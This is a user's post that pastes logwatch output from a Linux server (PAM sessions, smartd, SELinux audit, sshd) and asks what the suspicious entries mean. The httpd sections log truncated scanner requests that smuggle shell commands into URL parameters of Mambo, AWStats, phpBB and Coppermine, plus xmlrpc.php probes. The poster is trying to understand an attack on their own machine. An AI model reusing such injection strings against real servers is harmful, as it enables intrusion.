I haven't read root's email in about a month. Now that I get around to
it, I am suprised to see things that I have never seen before, such
as:
--------------------- pam_unix Begin ------------------------
kde-np:
Unknown Entries:
session opened for user dotancohen by (uid=0): 1 Time(s)
---------------------- pam_unix End -------------------------
--------------------- Smartd Begin ------------------------
**Unmatched Entries**
smartd received signal 15: Terminated
smartd is exiting (exit status 0)
---------------------- Smartd End -------------------------
--------------------- Selinux Audit Begin ------------------------
Number of audit daemon starts: 1
Number of audit daemon stops: 2
*** Logs which could mean a bug ***
major=252 name_count=0: freeing multiple contexts (1)
major=113 name_count=0: freeing multiple contexts (2)
---------------------- Selinux Audit End -------------------------
--------------------- SSHD Begin ------------------------
SSHD Killed: 1 Time(s)
SSHD Started: 1 Time(s)
---------------------- SSHD End -------------------------
--------------------- httpd Begin ------------------------
Requests with error response codes
404 Not Found
/cvs/index2.php?_REQUEST[option]=com_conte ... cho%20YYY;echo|: 1 Time(s)
/cvs/mambo/index2.php?_REQUEST[option]=com ... cho%20YYY;echo|: 1 Time(s)
/favicon.ico: 32 Time(s)
/javascript/HM_Arrays.js: 1 Time(s)
/javascript/HM_ScriptDOM.js: 1 Time(s)
/mambo/index2.php?_REQUEST[option]=com_con ... cho%20YYY;echo|: 1 Time(s)
/php/mambo/index2.php?_REQUEST[option]=com ... cho%20YYY;echo|: 1 Time(s)
---------------------- httpd End -------------------------
--------------------- pam_unix Begin ------------------------
kde:
Unknown Entries:
session closed for user dotancohen: 3 Time(s)
session opened for user dotancohen by (uid=0): 3 Time(s)
kde-np:
Unknown Entries:
session closed for user dotancohen: 3 Time(s)
session opened for user dotancohen by (uid=0): 2 Time(s)
su:
Sessions Opened:
(uid=500) -> root: 3 Time(s)
system-config-display:
Unknown Entries:
auth could not identify password for [root]: 1 Time(s)
---------------------- pam_unix End -------------------------
--------------------- httpd Begin ------------------------
Requests with error response codes
403 Forbidden
/cgi-bin/awstats.pl?configdir=|echo;echo%2 ... cho%20YYY;echo|: 1 Time(s)
/cgi-bin/awstats/awstats.pl?configdir=|ech ... cho%20YYY;echo|: 1 Time(s)
404 Not Found
/Forums/admin/admin_styles.php?phpbb_root_ ... cho%20YYY;echo|: 1 Time(s)
/Forums/admin/admin_styles.phpadmin_styles ... cho%20YYY;echo|: 1 Time(s)
/admin_styles.phpadmin_styles.php?phpbb_ro ... cho%20YYY;echo|: 1 Time(s)
/awstats/awstats.pl?configdir=|echo;echo%2 ... cho%20YYY;echo|: 1 Time(s)
/blog/xmlrpc.php: 2 Time(s)
/blog/xmlsrv/xmlrpc.php: 2 Time(s)
/blogs/xmlsrv/xmlrpc.php: 2 Time(s)
/cvs/index2.php?_REQUEST[option]=com_conte ... cho%20YYY;echo|: 1 Time(s)
/cvs/mambo/index2.php?_REQUEST[option]=com ... cho%20YYY;echo|: 1 Time(s)
/drupal/xmlrpc.php: 2 Time(s)
/mambo/index2.php?_REQUEST[option]=com_con ... cho%20YYY;echo|: 1 Time(s)
/modules/Forums/admin/admin_styles.php?php ... cho%20YYY;echo|: 1 Time(s)
/modules/Forums/admin/admin_styles.phpadmi ... cho%20YYY;echo|: 2 Time(s)
/modules/coppermine/themes/default/theme.p ... cho%20YYY;echo|: 2 Time(s)
/php/mambo/index2.php?_REQUEST[option]=com ... cho%20YYY;echo|: 1 Time(s)
/phpgroupware/xmlrpc.php: 2 Time(s)
/wordpress/xmlrpc.php: 2 Time(s)
/xmlrpc.php: 4 Time(s)
/xmlrpc/xmlrpc.php: 2 Time(s)
/xmlsrv/xmlrpc.php: 2 Time(s)
---------------------- httpd End -------------------------
--------------------- pam_unix Begin ------------------------
kde-np:
Unknown Entries:
session closed for user dotancohen: 2 Time(s)
session opened for user dotancohen by (uid=0): 1 Time(s)
su:
Sessions Opened:
(uid=500) -> root: 3 Time(s)
---------------------- pam_unix End -------------------------
These are the most suspicious. If anyone could crarify on them a bit,
i would appreciate it. Thank you!
Dotan Cohen
http://technology-sleuth.com/index.php
%^
